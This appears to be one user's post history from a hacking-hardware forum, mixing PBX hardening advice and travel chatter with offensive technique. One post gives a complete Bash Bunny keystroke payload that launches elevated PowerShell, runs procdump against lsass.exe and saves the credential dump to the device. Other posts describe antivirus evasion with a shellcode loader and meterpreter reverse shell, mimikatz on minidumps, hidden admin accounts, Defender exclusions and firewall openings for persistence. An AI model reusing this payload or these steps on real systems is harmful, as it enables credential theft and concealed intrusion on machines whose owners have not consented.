rottingsun
-
Posts
95 -
Joined
-
Last visited
-
Days Won
2
Everything posted by rottingsun
-
There's a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
-
Mimikatz for Windows 10 Creators Update
rottingsun replied to PoSHMagiC0de's topic in Applications & Coding
With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then running it through mimi in minidump mode. -
Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
-
A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
-
The latest Empire stagers actually have a bunny target.
-
Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
-
I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
-
KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
-
I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
-
I would but I don't wanna be hungover for work tomorrow.
-
Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
-
Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: - The one I previously posted about. That is, making the new user invisible to the Windows logon screen. - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. The possibilities are endless. I guess I just need to break down and order a bunny.
-
Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
-
Here is what I always used for enumerating the duck by the label DUCKY - for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d Then the ducky can actually be referenced by letter with the env var %duckydrive%.
-
This. If your company can afford one, you will be blown away vs all others.
-
IP PBX for small business
rottingsun replied to just.me.warner's topic in Business and Enterprise IT
Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right. -
Security Flaw Discovered in 2.0.0 by ihuntpineapples
rottingsun replied to ZaraByte's topic in WiFi Pineapple Mark V
Actually interested to see if Hak5 has any thoughts on the situation (good, bad, or indifferent)? Seems like the entire deal was a bit bizarre. -
PineAp recon and multi broadcast of SSIDs
rottingsun replied to bytedeez's topic in WiFi Pineapple Mark V
It was my understanding that pineap did work in that manner - that is, broadcast out SSIDs based on client probes. I could easily have gotten that wrong though. The audio on the talk was pretty bad. We may just have to wait for a tech doc or a follow up hangout. -
Security Flaw Discovered in 2.0.0 by ihuntpineapples
rottingsun replied to ZaraByte's topic in WiFi Pineapple Mark V
Not I get that - it just seems like the way he's going about it is totally ego driven. -
Security Flaw Discovered in 2.0.0 by ihuntpineapples
rottingsun replied to ZaraByte's topic in WiFi Pineapple Mark V
What's this guy's deal? Just to try to embarrass Darren and Seb? -
I always travel with only 2 bags, both of which I usually carry onto the plane (I don't like checking because of chances for lost luggage or theft). One is a small brown leather bag containing all of my clothes, and the other is my laptop backpack. That's the main reason I was asking the question really - if the overlords at the x-ray machine will make a fuss over a pineapple.
-
Have you ever dealt with a TSA employee on a power trip?
-
IP PBX for small business
rottingsun replied to just.me.warner's topic in Business and Enterprise IT
What is the budget we're talking here? Would you consider using your own server and putting the software on it yourself, are or you looking more for something like a turn key appliance? -
Anyone have any experience with carrying a MK5 through TSA? Are they trained to identify and confiscate them now, or can I get away with saying that the plain black device with 2 antennas is my "mobile router"?
-
Pineapple mentioned by name by Palo Alto Networks
rottingsun replied to rottingsun's topic in WiFi Pineapple Mark V
Just for some additional background, Palo Alto Networks is a firewall company started by Nir Zuk. It's up for debate who was the very first to come up with the tech, but Nir Zuk is widely reputed to be the guy who invented stateful packet inspection while working for Check Point Software. Stateful inspection is the tech that most all modern enterprise firewalls are based on. It's a huge compliment (in my humble opinion, at least) that a company like PAN mentioned the Pineapple by name.
